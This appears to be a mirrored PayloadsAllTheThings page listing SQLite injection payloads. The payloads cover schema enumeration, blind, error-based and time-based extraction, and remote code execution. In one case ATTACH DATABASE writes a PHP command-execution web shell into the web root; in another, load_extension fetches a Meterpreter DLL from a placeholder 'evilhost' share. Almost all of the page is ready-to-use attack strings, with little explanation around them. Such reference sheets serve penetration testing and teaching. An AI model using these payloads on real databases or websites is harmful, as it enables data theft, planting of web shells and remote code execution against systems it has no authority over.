mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-21 03:46:10 +00:00
5.1 KiB
5.1 KiB
SQLite Injection
SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.
Summary
- SQLite Comments
- SQLite Enumeration
- SQLite String
- SQLite Blind
- SQlite Error Based
- SQlite Time Based
- SQlite Remote Code Execution
- SQLite File Manipulation
- References
SQLite Comments
Description | Comment |
---|---|
Single-Line Comment | -- |
Multi-Line Comment | /**/ |
SQLite Enumeration
Description | SQL Query |
---|---|
DBMS version | select sqlite_version(); |
SQLite String
SQLite String Methodology
Description | SQL Query |
---|---|
Extract Database Structure | SELECT sql FROM sqlite_schema |
Extract Database Structure (sqlite_version > 3.33.0) | SELECT sql FROM sqlite_master |
Extract Table Name | SELECT tbl_name FROM sqlite_master WHERE type='table' |
Extract Table Name | SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' |
Extract Column Name | SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' |
Extract Column Name | SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name'); |
Extract Column Name | SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='<TABLE_NAME>' |
Extract Column Name | SELECT name FROM PRAGMA_TABLE_INFO('<TABLE_NAME>') |
SQLite Blind
SQLite Blind Methodology
Description | SQL Query |
---|---|
Count Number Of Tables | AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table |
Enumerating Table Name | AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number |
Extract Info | AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char') |
Extract Info (order by) | CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END |
SQLite Blind With Substring Equivalent
Function | Example |
---|---|
SUBSTRING |
SUBSTRING('foobar', <START>, <LENGTH>) |
SUBSTR |
SUBSTR('foobar', <START>, <LENGTH>) |
SQlite Error Based
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
SQlite Time Based
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SQLite Remote Code Execution
Attach Database
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
Load_extension
⚠️ This component is disabled by default.
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
SQLite File Manipulation
SQLite Read File
SQLite does not support file I/O operations by default.
SQLite Write File
SELECT writefile('/path/to/file', column_name) FROM table_name